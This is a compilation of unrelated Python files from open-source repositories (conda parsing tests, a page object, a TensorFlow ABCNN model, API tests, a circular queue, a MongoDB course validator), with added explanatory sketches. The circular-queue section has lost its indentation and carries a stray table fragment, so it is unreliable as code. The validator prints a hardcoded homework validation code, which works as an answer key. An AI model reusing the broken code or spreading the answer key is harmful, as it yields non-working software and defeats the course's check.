        self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
        self.assertEqual(cp['build_number'], 1)
        self.assertEqual(cp['build_string'], 'hecd8cb5_1')
        self.assertEqual(cp['channel'], 'pkgs/main')
        self.assertEqual(cp['dist_name'], 'ca-certificates-2021.7.5-hecd8cb5_1')
        self.assertEqual(cp['name'], 'ca-certificates')
        self.assertEqual(cp['platform'], 'osx-64')
        self.assertEqual(cp['version'], '2021.7.5')
        self.assertEqual(cp['md5_hash'], 'c2d0ae65c08dacdcf86770b7b5bbb187')

    def test_parse_conda_list_str_with_hash_3(self) -> None:
        cp: CondaPackage = parse_conda_list_str_to_conda_package(
            conda_list_str='https://repo.anaconda.com/pkgs/main/noarch/idna-2.10-pyhd3eb1b0_0.tar.bz2'
                           '#153ff132f593ea80aae2eea61a629c92'
        )
        self.assertIsInstance(cp, dict)
        self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
        self.assertEqual(cp['build_number'], 0)
        self.assertEqual(cp['build_string'], 'pyhd3eb1b0_0')
        self.assertEqual(cp['channel'], 'pkgs/main')
        self.assertEqual(cp['dist_name'], 'idna-2.10-pyhd3eb1b0_0')
        self.assertEqual(cp['name'], 'idna')
        self.assertEqual(cp['platform'], 'noarch')
        self.assertEqual(cp['version'], '2.10')
        self.assertEqual(cp['md5_hash'], '153ff132f593ea80aae2eea61a629c92')
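The behaviour these tests pin down can be approximated with stdlib string handling alone. The sketch below is NOT the cyclonedx implementation, just a simplified, hypothetical decomposition of a conda download URL (the md5 fragment here is a made-up placeholder):

```python
import posixpath

url = 'https://repo.anaconda.com/pkgs/main/osx-64/chardet-4.0.0-py39hecd8cb5_1003.conda#abc123'
# the optional fragment after '#' carries the md5 hash
url, _, md5 = url.partition('#')
# URL paths use '/', so posixpath works regardless of the host OS
platform = posixpath.basename(posixpath.dirname(url))
dist_name = posixpath.basename(url)
for ext in ('.conda', '.tar.bz2'):
    if dist_name.endswith(ext):
        dist_name = dist_name[:-len(ext)]
# rsplit from the right: package names may themselves contain '-'
name, version, build_string = dist_name.rsplit('-', 2)
print(name, version, build_string, platform, md5)
```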
# ======================================================================
# File: ground/__init__.py
# Repo: lycantropos/ground (license: MIT)
# ======================================================================
"""Basis of computational geometry."""
__version__ = '7.1.1'
# ======================================================================
# File: docs/code/round_3/pages.py
# Repo: jzoldak/bok-choy (license: Apache-2.0)
# ======================================================================
import re
from bok_choy.page_object import PageObject


class GitHubSearchResultsPage(PageObject):
    """
    GitHub's search results page
    """

    url = None

    def is_browser_on_page(self):
        # This should be something like: u'Search · foo bar · GitHub'
        title = self.browser.title
        matches = re.match('^Search .+ GitHub$', title)
        return matches is not None

    @property
    def search_results(self):
        """
        Return a list of results returned from a search
        """
        return self.q(css='ul.repo-list > li > div > div > div.f4').text


class GitHubSearchPage(PageObject):
    """
    GitHub's search page
    """

    url = 'http://www.github.com/search'

    def is_browser_on_page(self):
        return self.q(css='button.btn').is_present()

    def enter_search_terms(self, text):
        """
        Fill the text into the input field
        """
        self.q(css='#search_form input[type="text"]').fill(text)

    def search(self):
        """
        Click on the Search button and wait for the
        results page to be displayed
        """
        self.q(css='button.btn').click()
        GitHubSearchResultsPage(self.browser).wait_for_page()

    def search_for_terms(self, text):
        """
        Fill in the search terms and click the
        Search button
        """
        self.enter_search_terms(text)
        self.search()
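bok-choy aside, the page-object pattern itself needs no framework: a page wraps a browser handle, exposes an is_browser_on_page() predicate, and groups user actions as methods. A minimal framework-free sketch with a stubbed browser (the title string is hypothetical):

```python
import re

class FakeBrowser:  # stub standing in for a real WebDriver
    title = "Search - results - GitHub"

class SearchResultsPage:
    def __init__(self, browser):
        self.browser = browser

    def is_browser_on_page(self):
        # same title check as the bok-choy page object above
        return re.match('^Search .+ GitHub$', self.browser.title) is not None

on_page = SearchResultsPage(FakeBrowser()).is_browser_on_page()
print(on_page)
```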
# ======================================================================
# File: class-1/read_jy.py
# Repo: dyrbrm/pynet-test (license: Apache-2.0)
# ======================================================================
#!/usr/bin/env python
import yaml
import json
import pprint

with open("yaml_file.yml") as f:
    new_yaml_list = yaml.load(f)

with open("json_file.json") as f:
    new_json_list = json.load(f)

print "yaml file="
print new_yaml_list
print "json file="
print new_json_list
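The same load pattern can be shown with only the stdlib json module (for the YAML side, yaml.safe_load(f) is the safer modern spelling of yaml.load(f)). The file path and data here are hypothetical, written to a temp directory:

```python
import json
import os
import tempfile

data = {"hosts": ["alpha", "beta"]}  # hypothetical sample data
path = os.path.join(tempfile.mkdtemp(), "sample.json")
with open(path, "w") as f:
    json.dump(data, f)
with open(path) as f:
    loaded = json.load(f)
print(loaded == data)
```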
# ======================================================================
# File: scripts/hello.py
# Repo: LukeB42/Emissary (license: MIT)
# ======================================================================
# _*_ coding: utf-8 _*_
#
# This script creates a named pipe (if it doesn't exist)
# and writes the feed name, article title and url to it
# whenever an article is saved to the database.
#
# This is useful for composing systems that constantly read
# the FIFO and do things like emit the data to IRC channels.
#
# You could, for instance, perform fuzzy pattern matching and be
# notified when certain keywords are in the news.
#
# Transmission to a natural language processing/translation service
# can also be done in a script or by reading a FIFO like the one here.
#
# Whether you use this system to profit, perform intelligence analysis
# or inform your next vote is hopefully up to you!
#
# Luke Brooks, 2015
# MIT License
# Many big thanks to God, lord of universes.
fifo = "/tmp/emissary.pipe"

import os, stat

if not os.path.exists(fifo):
    try:
        os.mkfifo(fifo)
    except Exception, e:
        cache['app'].log("Error creating %s: %s" % (fifo, e.message))

# Emissary always executes scripts with an article and its feed in the namespace.
# There is also a dictionary named cache, containing the app object.
# Random aside but through the app object you can access the logging interface and the feed manager.
try:
    # READER BEWARE: Use non-blocking IO or you won't be storing owt.
    fd = os.open(fifo, os.O_CREAT | os.O_WRONLY | os.O_NONBLOCK)
    os.write(fd, "%s: %s\n%s\n" % (feed.name, article.title, article.url))
    os.close(fd)
    del fd
except Exception, e:  # Usually due to there not being a reader fd known to the kernel.
    pass

del os, stat, fifo
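The "READER BEWARE" note can be demonstrated directly: on a POSIX system, opening a FIFO for non-blocking write fails with ENXIO when no reader has the other end open, which is exactly the error the bare except above swallows. This sketch assumes Linux/POSIX and uses a temp-dir FIFO rather than /tmp/emissary.pipe:

```python
import errno
import os
import tempfile

fifo = os.path.join(tempfile.mkdtemp(), "demo.pipe")
os.mkfifo(fifo)

got_enxio = False
try:
    # no process is reading the FIFO, so this open must fail
    fd = os.open(fifo, os.O_WRONLY | os.O_NONBLOCK)
    os.close(fd)
except OSError as e:
    got_enxio = (e.errno == errno.ENXIO)
print(got_enxio)
```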


# projects/model/Category.py (chamathshashika/projects-python-wrappers, MIT License)
#$Id$
class Category:
    """This class is used to create object for category."""

    def __init__(self):
        """Initialize parameters for Category."""
        self.id = ""
        self.name = ""

    def set_id(self, id):
        """Set id.

        Args:
            id(str): Id.

        """
        self.id = id

    def get_id(self):
        """Get id.

        Returns:
            str: Id.

        """
        return self.id

    def set_name(self, name):
        """Set name.

        Args:
            name(str): Name.

        """
        self.name = name

    def get_name(self):
        """Get name.

        Returns:
            str: Name.

        """
        return self.name


# src/squirrel/shared/setupsql.py (bvz2000/squirrel, Unlicense)
import inspect
import configparser
import os.path
# ----------------------------------------------------------------------------------------------------------------------
def create_sql_object():
    """
    Create a sql resources object.

    :return:
        A sql resources object.
    """
    module_d = os.path.split(inspect.stack()[0][1])[0]
    resources_d = os.path.abspath(os.path.join(module_d, "..", "..", "..", "resources"))

    parser = configparser.ConfigParser()
    parser.read(os.path.join(resources_d, "sql.ini"))

    return parser
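The function above just points a `configparser.ConfigParser` at a `resources/sql.ini` file relative to the module. The same pattern can be exercised against a throwaway ini (the section and key names here are invented for illustration, not taken from squirrel):

```python
import configparser
import os
import tempfile

# Write a throwaway ini file standing in for resources/sql.ini.
ini_path = os.path.join(tempfile.mkdtemp(), "sql.ini")
with open(ini_path, "w") as f:
    f.write("[queries]\nget_asset = SELECT * FROM assets WHERE id = ?\n")

# Same pattern as create_sql_object(): build a parser, read the ini,
# then look queries up by section and key.
parser = configparser.ConfigParser()
parser.read(ini_path)
print(parser["queries"]["get_asset"])
```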


# tests/test_fpl.py (emre/fpl, MIT License)
import unittest
from fpl import FPL
from fpl.models.classic_league import ClassicLeague
from fpl.models.fixture import Fixture
from fpl.models.gameweek import Gameweek
from fpl.models.h2h_league import H2HLeague
from fpl.models.player import Player
from fpl.models.team import Team
from fpl.models.user import User
class FPLTest(unittest.TestCase):
    def setUp(self):
        self.fpl = FPL()

    def test_user(self):
        user = self.fpl.get_user("3523615")
        self.assertIsInstance(user, User)

    def test_team(self):
        team = self.fpl.get_team(1)
        self.assertIsInstance(team, Team)

    def test_teams(self):
        teams = self.fpl.get_teams()
        self.assertIsInstance(teams, list)
        self.assertEqual(len(teams), 20)
        self.assertIsInstance(teams[0], Team)

    def test_player(self):
        player = self.fpl.get_player(1)
        self.assertIsInstance(player, Player)

    def test_players(self):
        players = self.fpl.get_players()
        self.assertIsInstance(players, list)
        self.assertIsInstance(players[0], Player)

    def test_fixture(self):
        fixture = self.fpl.get_fixture(6)
        self.assertIsInstance(fixture, Fixture)

        fixture = self.fpl.get_fixture(6, gameweek=1)
        self.assertIsInstance(fixture, Fixture)

    def test_fixtures(self):
        fixtures = self.fpl.get_fixtures()
        self.assertIsInstance(fixtures, list)
        self.assertIsInstance(fixtures[0], Fixture)

        fixtures = self.fpl.get_fixtures(gameweek=1)
        self.assertEqual(len(fixtures), 10)
        self.assertIsInstance(fixtures, list)
        self.assertIsInstance(fixtures[0], Fixture)

    def test_gameweeks(self):
        gameweeks = self.fpl.get_gameweeks()
        self.assertIsInstance(gameweeks, list)
        self.assertEqual(len(gameweeks), 38)

    def test_gameweek(self):
        gameweek = self.fpl.get_gameweek("20")
        self.assertIsInstance(gameweek, Gameweek)

    def test_game_settings(self):
        game_settings = self.fpl.game_settings()
        self.assertIsInstance(game_settings, dict)

    def test_classic_league(self):
        classic_league = self.fpl.get_classic_league("890172")
        self.assertIsInstance(classic_league, ClassicLeague)

    def test_h2h_league(self):
        h2h_league = self.fpl.get_h2h_league("760869")
        self.assertIsInstance(h2h_league, H2HLeague)


if __name__ == '__main__':
    unittest.main()


# abcnn.py (ameyagodbole/ABCNN-tensorflow, MIT License)
"""
An implementation of ABCNN from
ABCNN: Attention-Based Convolutional Neural Network for Modeling Sentence Pairs
Yin, W.; Schutze, H.; Xiang, B.; and Zhou, B.
"""
import tensorflow as tf
import numpy as np

'''
Each config should be a dictionary with entries:
    type : Type of convolutional layer, depending on the use of an attention map; one of BCNN, ABCNN-1, ABCNN-2, ABCNN-3
    w    : Width of the convolutional kernel
    n    : Number of convolutional filters
    nl   : Type of non-linearity; one of 'tanh' or 'relu'
'''
DEFAULT_CONFIG = [{'type': 'ABCNN-3', 'w': 3, 'n': 50, 'nl': 'tanh'} for _ in range(3)]
class ABCNN:
    def __init__(self, conv_layers, embed_size, sentence_len, external_measures=0, config=DEFAULT_CONFIG):
        self.conv_layers = conv_layers
        self.embed_size = embed_size
        self.sentence_len = sentence_len
        self.external_measures = external_measures
        self.config = config
        print 'ABCNN params initialised'
    def _conv_layer(self, config, input):
        kernel = tf.get_variable('kernel', [input.get_shape()[1], config['w'], input.get_shape()[3], config['n']],
                                 initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
        conv = tf.nn.conv2d(input, kernel, strides=[1, 1, 1, 1], padding='VALID')
        biases = tf.get_variable("biases", config['n'], dtype=tf.float32, initializer=tf.constant_initializer(0.0))
        if config['nl'] == 'tanh':
            nl = tf.nn.tanh
        elif config['nl'] == 'relu':
            nl = tf.nn.relu
        else:
            raise ValueError('_conv_layer: %s is not implemented' % config['nl'])
        return nl(conv + biases)
    def _add_BCNN(self, id, config, last, layer_input):
        scope_name = 'BCNN_' + str(id)
        with tf.variable_scope(scope_name, initializer=tf.contrib.layers.xavier_initializer()) as scope:
            with tf.variable_scope('conv') as scope:
                padded_in1 = tf.pad(layer_input[0], [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                padded_in2 = tf.pad(layer_input[1], [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                conv1 = self._conv_layer(config, padded_in1)
                scope.reuse_variables()
                conv2 = self._conv_layer(config, padded_in2)
            if last:
                with tf.variable_scope('all-ap') as scope:
                    ap1 = tf.reduce_mean(conv1, axis=[1, 2])
                    ap2 = tf.reduce_mean(conv2, axis=[1, 2])
                    return ap1, ap2
            else:
                with tf.variable_scope('%d-ap' % config['w']) as scope:
                    avg_pool1 = tf.nn.avg_pool(conv1, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool1')
                    avg_pool2 = tf.nn.avg_pool(conv2, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool2')
                    ap1 = tf.transpose(avg_pool1, perm=[0, 3, 2, 1], name='ap1')
                    ap2 = tf.transpose(avg_pool2, perm=[0, 3, 2, 1], name='ap2')
                    return ap1, ap2
    def _add_ABCNN_1(self, id, config, last, layer_input):
        scope_name = 'ABCNN1_' + str(id)
        with tf.variable_scope(scope_name, initializer=tf.contrib.layers.xavier_initializer()) as scope:
            with tf.variable_scope('similarity') as scope:
                tile_in1 = tf.tile(layer_input[0], [1, 1, 1, layer_input[1].get_shape().as_list()[2]], name='tile1')
                tile_in2 = tf.transpose(layer_input[1], [0, 1, 3, 2], name='tile2')
                sq_dist = tf.squared_difference(tile_in1, tile_in2, name='sq_dist')
                pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1]), name='pair_dist')
                similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0, dtype=tf.float32, name='one')), name='similarity')
            with tf.variable_scope('attention') as scope:
                W = tf.get_variable('W', [1, layer_input[0].get_shape()[1], layer_input[0].get_shape()[2]],
                                    initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
                W_tiled = tf.tile(W, [layer_input[0].get_shape().as_list()[0], 1, 1])
                A1 = tf.matmul(W_tiled, tf.transpose(similarity, [0, 2, 1]), name='attention_map1')
                A2 = tf.matmul(W_tiled, similarity, name='attention_map2')
            with tf.variable_scope('conv') as scope:
                layer_in1 = tf.concat([layer_input[0], tf.expand_dims(A1, -1)], axis=3)
                layer_in2 = tf.concat([layer_input[1], tf.expand_dims(A2, -1)], axis=3)
                padded_in1 = tf.pad(layer_in1, [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                padded_in2 = tf.pad(layer_in2, [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                conv1 = self._conv_layer(config, padded_in1)
                scope.reuse_variables()
                conv2 = self._conv_layer(config, padded_in2)
            if last:
                with tf.variable_scope('all-ap') as scope:
                    ap1 = tf.reduce_mean(conv1, axis=[1, 2])
                    ap2 = tf.reduce_mean(conv2, axis=[1, 2])
                    return ap1, ap2
            else:
                with tf.variable_scope('%d-ap' % config['w']) as scope:
                    avg_pool1 = tf.nn.avg_pool(conv1, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool1')
                    avg_pool2 = tf.nn.avg_pool(conv2, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool2')
                    ap1 = tf.transpose(avg_pool1, perm=[0, 3, 2, 1], name='ap1')
                    ap2 = tf.transpose(avg_pool2, perm=[0, 3, 2, 1], name='ap2')
                    return ap1, ap2
    def _add_ABCNN_2(self, id, config, last, layer_input):
        scope_name = 'ABCNN2_' + str(id)
        with tf.variable_scope(scope_name, initializer=tf.contrib.layers.xavier_initializer()) as scope:
            with tf.variable_scope('conv') as scope:
                padded_in1 = tf.pad(layer_input[0], [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                padded_in2 = tf.pad(layer_input[1], [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                conv1 = self._conv_layer(config, padded_in1)
                scope.reuse_variables()
                conv2 = self._conv_layer(config, padded_in2)
            with tf.variable_scope('similarity') as scope:
                conv1t = tf.transpose(conv1, [0, 3, 2, 1], name='conv1t')
                conv2t = tf.transpose(conv2, [0, 3, 2, 1], name='conv2t')
                tile_out1 = tf.tile(conv1t, [1, 1, 1, conv2.get_shape().as_list()[2]], name='tile1')
                tile_out2 = tf.transpose(conv2t, [0, 1, 3, 2], name='tile2')
                sq_dist = tf.squared_difference(tile_out1, tile_out2, name='sq_dist')
                pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1]), name='pair_dist')
                similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0, dtype=tf.float32, name='one')), name='similarity')
            with tf.variable_scope('attention') as scope:
                A1 = tf.reduce_sum(similarity, axis=[2], name='attention_map1')
                A2 = tf.reduce_sum(similarity, axis=[1], name='attention_map2')
                A1e = tf.expand_dims(A1, 1)
                A2e = tf.expand_dims(A2, 1)
                A1f = tf.expand_dims(A1e, -1)
                A2f = tf.expand_dims(A2e, -1)
                conv1w = tf.multiply(conv1t, A1f, name='weighted_conv1')
                conv2w = tf.multiply(conv2t, A2f, name='weighted_conv2')
            if last:
                with tf.variable_scope('all-ap') as scope:
                    ap1 = tf.reduce_mean(conv1w, axis=[2, 3])
                    ap2 = tf.reduce_mean(conv2w, axis=[2, 3])
                    return ap1, ap2
            else:
                with tf.variable_scope('%d-ap' % config['w']) as scope:
                    avg_pool1 = tf.nn.avg_pool(conv1w, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool1')
                    avg_pool2 = tf.nn.avg_pool(conv2w, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool2')
                    return avg_pool1, avg_pool2
    def _add_ABCNN_3(self, id, config, last, layer_input):
        scope_name = 'ABCNN3_' + str(id)
        with tf.variable_scope(scope_name, initializer=tf.contrib.layers.xavier_initializer()) as scope:
            with tf.variable_scope('similarity_pre') as scope:
                tile_in1 = tf.tile(layer_input[0], [1, 1, 1, layer_input[1].get_shape().as_list()[2]], name='tile1')
                tile_in2 = tf.transpose(layer_input[1], [0, 1, 3, 2], name='tile2')
                sq_dist = tf.squared_difference(tile_in1, tile_in2, name='sq_dist')
                pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1]), name='pair_dist')
                similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0, dtype=tf.float32, name='one')), name='similarity')
            with tf.variable_scope('attention_pre') as scope:
                W = tf.get_variable('W', [1, layer_input[0].get_shape()[1], layer_input[0].get_shape()[2]],
                                    initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
                W_tiled = tf.tile(W, [layer_input[0].get_shape().as_list()[0], 1, 1])
                A1 = tf.matmul(W_tiled, tf.transpose(similarity, [0, 2, 1]), name='attention_map1')
                A2 = tf.matmul(W_tiled, similarity, name='attention_map2')
            with tf.variable_scope('conv') as scope:
                layer_in1 = tf.concat([layer_input[0], tf.expand_dims(A1, -1)], axis=3)
                layer_in2 = tf.concat([layer_input[1], tf.expand_dims(A2, -1)], axis=3)
                padded_in1 = tf.pad(layer_in1, [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                padded_in2 = tf.pad(layer_in2, [[0, 0], [0, 0], [config['w'] - 1, config['w'] - 1], [0, 0]], 'constant')
                conv1 = self._conv_layer(config, padded_in1)
                scope.reuse_variables()
                conv2 = self._conv_layer(config, padded_in2)
            with tf.variable_scope('similarity_post') as scope:
                conv1t = tf.transpose(conv1, [0, 3, 2, 1], name='conv1t')
                conv2t = tf.transpose(conv2, [0, 3, 2, 1], name='conv2t')
                tile_out1 = tf.tile(conv1t, [1, 1, 1, conv2.get_shape().as_list()[2]], name='tile1')
                tile_out2 = tf.transpose(conv2t, [0, 1, 3, 2], name='tile2')
                sq_dist = tf.squared_difference(tile_out1, tile_out2, name='sq_dist')
                pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1]), name='pair_dist')
                similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0, dtype=tf.float32, name='one')), name='similarity')
            with tf.variable_scope('attention_post') as scope:
                A1 = tf.reduce_sum(similarity, axis=[2], name='attention_map1')
                A2 = tf.reduce_sum(similarity, axis=[1], name='attention_map2')
                A1e = tf.expand_dims(A1, 1)
                A2e = tf.expand_dims(A2, 1)
                A1f = tf.expand_dims(A1e, -1)
                A2f = tf.expand_dims(A2e, -1)
                conv1w = tf.multiply(conv1t, A1f, name='weighted_conv1')
                conv2w = tf.multiply(conv2t, A2f, name='weighted_conv2')
            if last:
                with tf.variable_scope('all-ap') as scope:
                    ap1 = tf.reduce_mean(conv1w, axis=[2, 3])
                    ap2 = tf.reduce_mean(conv2w, axis=[2, 3])
                    return ap1, ap2
            else:
                with tf.variable_scope('%d-ap' % config['w']) as scope:
                    avg_pool1 = tf.nn.avg_pool(conv1w, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool1')
                    avg_pool2 = tf.nn.avg_pool(conv2w, [1, 1, config['w'], 1], strides=[1, 1, 1, 1], padding="VALID", name='avg_pool2')
                    return avg_pool1, avg_pool2
    def build_graph(self, embed_matrix, train_embed_matrix, batch_size):
        print 'Building graph...'
        self.global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')

        with tf.name_scope("data"):
            self.in1 = tf.placeholder(tf.int32, shape=[batch_size, self.sentence_len], name='in1')
            self.in2 = tf.placeholder(tf.int32, shape=[batch_size, self.sentence_len], name='in2')
            if self.external_measures > 0:
                self.ext = tf.placeholder(tf.float32, shape=[batch_size, self.external_measures], name='ext_measure')
            self.target = tf.placeholder(tf.float32, shape=[batch_size], name='target')

        with tf.variable_scope('embedding') as scope:
            embedding_weights = tf.Variable(initial_value=embed_matrix, dtype=tf.float32,
                                            trainable=train_embed_matrix, name='embedding_weights')
            eq1 = tf.nn.embedding_lookup(embedding_weights, self.in1)
            eq2 = tf.nn.embedding_lookup(embedding_weights, self.in2)
            tq1 = tf.transpose(eq1, [0, 2, 1], name='t_q1')
            tq2 = tf.transpose(eq2, [0, 2, 1], name='t_q2')
            self.q1 = tf.expand_dims(tq1, -1, name='q1')
            self.q2 = tf.expand_dims(tq2, -1, name='q2')

        layer_input = [self.q1, self.q2]
        for i in range(self.conv_layers):
            last = (i == self.conv_layers - 1)
            if self.config[i]['type'] == 'ABCNN-3':
                layer_input = self._add_ABCNN_3(i, self.config[i], last, layer_input)
            elif self.config[i]['type'] == 'ABCNN-2':
                layer_input = self._add_ABCNN_2(i, self.config[i], last, layer_input)
            elif self.config[i]['type'] == 'ABCNN-1':
                layer_input = self._add_ABCNN_1(i, self.config[i], last, layer_input)
            elif self.config[i]['type'] == 'BCNN':
                layer_input = self._add_BCNN(i, self.config[i], last, layer_input)
            else:
                raise ValueError('Unrecognised conv layer type')

        with tf.variable_scope('fc') as scope:
            if self.external_measures > 0:
                fc_in = tf.concat([layer_input[0], layer_input[1], self.ext], axis=1)
            else:
                fc_in = tf.concat([layer_input[0], layer_input[1]], axis=1)
            w = tf.Variable(tf.truncated_normal([fc_in.get_shape().as_list()[1], 1], stddev=0.1, dtype=tf.float32), name='weights')
            b = tf.Variable(tf.zeros([1], dtype=tf.float32), name="bias")
            logit_r = tf.matmul(fc_in, w) + b
            logits = tf.reshape(logit_r, [-1])

        with tf.name_scope('loss'):
            self.cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=self.target))
            optimizer = tf.train.AdamOptimizer()
            self.train_step = optimizer.minimize(self.cross_entropy, global_step=self.global_step, name='train_step')

        with tf.name_scope('prediction'):
            self.prediction = tf.round(tf.sigmoid(logits), name='prediction')
            correct_prediction = tf.equal(self.prediction, self.target)
            self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')

        with tf.name_scope("summaries"):
            tf.summary.scalar("loss", self.cross_entropy)
            tf.summary.scalar("accuracy", self.accuracy)
            tf.summary.histogram("histogram_loss", self.cross_entropy)
            self.summary_op = tf.summary.merge_all()

        self.init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
        print 'Done'
if __name__ == '__main__':
    c = ABCNN(conv_layers=3, embed_size=50, sentence_len=40)
    c.build_graph(np.random.randn(20, 50), 1, 128)
    with tf.Session() as sess:
        sess.run(c.init_op)
        writer = tf.summary.FileWriter('./graph', sess.graph)
        writer.close()


# coding_interview/25.py (smartx-jshan/Coding_Practice, Apache-2.0 License)
class MyCircularQueue:
] | null | null | null | class MyCircularQueue:
def __init__(self, k: int):
self.q = [None] * k
self.maxlen = k
self.front = 0
self.rear = 0
def enQueue(self, value: int) -> bool:
if self.q[self.rear] is None:
self.q[self.rear] = value
self.rear = (self.rear + 1 ) % self.maxlen
return True
return False
def deQueue(self) -> bool:
if self.front == self.rear and self.q[self.front] is None:
return False
self.q[self.front] = None
self.front = (self.front +1) % self.maxlen
return True
def Front(self) -> int:
if self.q[self.front] is None:
return -1
return self.q[self.front]
def Rear(self) -> int:
if self.q[self.rear -1] is None:
return -1
return self.q[self.rear-1]
def isEmpty(self) -> bool:
if self.front == self.rear and self.q[self.rear] is None:
return True
return False
def isFull(self) -> bool:
if self.front == self.rear and self.q[self.rear] is not None:
return True
return False
# Your MyCircularQueue object will be instantiated and called as such:
# obj = MyCircularQueue(k)
# param_1 = obj.enQueue(value)
# param_2 = obj.deQueue()
# param_3 = obj.Front()
# param_4 = obj.Rear()
# param_5 = obj.isEmpty()
# param_6 = obj.isFull()
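The queue above leans entirely on modular index arithmetic (`(i + 1) % maxlen`) for wrap-around; both pointers cycle through the fixed-size buffer the same way. This tiny standalone sketch (not part of the solution, just an illustration) traces how such a pointer cycles through a 3-slot buffer:

```python
# Trace the positions a pointer visits in a 3-slot circular buffer.
maxlen = 3
rear = 0
positions = []
for _ in range(7):
    positions.append(rear)
    rear = (rear + 1) % maxlen
print(positions)  # [0, 1, 2, 0, 1, 2, 0]
```

The pointer returns to slot 0 after every `maxlen` steps, which is why `front == rear` alone cannot distinguish empty from full; the class disambiguates by also checking whether the slot holds `None`.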


# django/docs/releases/1.11.28.txt.py (roshanba/mangal): file contents redacted in the source.


# src/m101j/week02/project/m101j_blog/validate_sourcecode.py (hemmerling/nosql-mongodb2013, Apache-2.0 License)
import pymongo
import urllib2
import urllib
import cookielib
import random
import re
import string
# makes a little salt
def make_salt(n):
salt = ""
for i in range(n):
salt = salt + random.choice(string.ascii_letters)
return salt
# this is a validation program to make sure that the blog works correctly.
def create_user(username, password):
    try:
        print "Trying to create a test user ", username
        cj = cookielib.CookieJar()
        url = "http://localhost:8082/signup"
        data = urllib.urlencode([("email", ""), ("username", username), ("password", password), ("verify", password)])
        request = urllib2.Request(url=url, data=data)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        f = opener.open(request)

        # check that the user is in the user table
        connection = pymongo.Connection("mongodb://localhost", safe=True)
        db = connection.blog
        users = db.users
        user = users.find_one({'_id': username})
        if (user == None):
            print "Could not find the test user ", username, "in the users collection."
            return False
        print "Found the test user ", username, " in the users collection"

        # check that the user has been built
        result = f.read()
        expr = re.compile("Welcome\s+" + username)
        if expr.search(result):
            return True
        print "When we tried to create a user, here is the output we got\n"
        print result
        return False
    except:
        print "the request to ", url, " failed, so your blog may not be running."
        return False
def try_to_login(username, password):
    try:
        print "Trying to login for test user ", username
        cj = cookielib.CookieJar()
        url = "http://localhost:8082/login"
        data = urllib.urlencode([("username", username), ("password", password)])
        request = urllib2.Request(url=url, data=data)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        f = opener.open(request)

        # check for successful login
        result = f.read()
        expr = re.compile("Welcome\s+" + username)
        if expr.search(result):
            return True
        print "When we tried to login, here is the output we got\n"
        print result
        return False
    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise
username = make_salt(7)
password = make_salt(8)

# try to create user
if (create_user(username, password)):
    print "User creation successful. "
    # try to login
    if (try_to_login(username, password)):
        print "User login successful."
        print "Validation Code is ", "fhj837hf9376hgf93hf832jf9"
    else:
        print "User login failed"
        print "Sorry, you have not solved it yet."
else:
    print "Sorry, you have not solved it yet."
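The script above is Python 2 (`urllib2`, `cookielib`, print statements). As a side note, its `make_salt` helper collapses to a one-liner in modern Python 3 — a sketch, not part of the original validator:

```python
import random
import string


def make_salt(n: int) -> str:
    # Python 3 equivalent of the make_salt helper above:
    # n random ASCII letters joined into one string.
    return "".join(random.choice(string.ascii_letters) for _ in range(n))


token = make_salt(7)
print(token)
```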


# Python/LongestSubstringWithoutRepeatingCharactersTest.py (TonnyL/Windary, MIT License)
from unittest import TestCase
from LongestSubstringWithoutRepeatingCharacters import LongestSubstringWithoutRepeatingCharacters
class TestLongestSubstringWithoutRepeatingCharacters(TestCase):
    def test_lengthOfLongestSubstring(self):
        lswrc = LongestSubstringWithoutRepeatingCharacters()

        # Expected: "wke", 3
        self.assertTrue(lswrc.lengthOfLongestSubstring("pwwkew") == 3)

        # Expected: "b", 1
        self.assertTrue(lswrc.lengthOfLongestSubstring("bbbbb") == 1)

        # Expected: "abc", 3
        self.assertTrue(lswrc.lengthOfLongestSubstring("abcabcbb") == 3)

        # Expected: "vdf", 3
        self.assertTrue(lswrc.lengthOfLongestSubstring("dvdf") == 3)
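The class under test is imported from a module not shown here. A standard sliding-window implementation consistent with the expected values in these tests might look like this (a sketch, not the repository's actual solution):

```python
def length_of_longest_substring(s: str) -> int:
    # Classic sliding window: 'start' marks the left edge of the current
    # repeat-free window; 'seen' maps each character to its last index.
    seen = {}
    start = 0
    best = 0
    for i, ch in enumerate(s):
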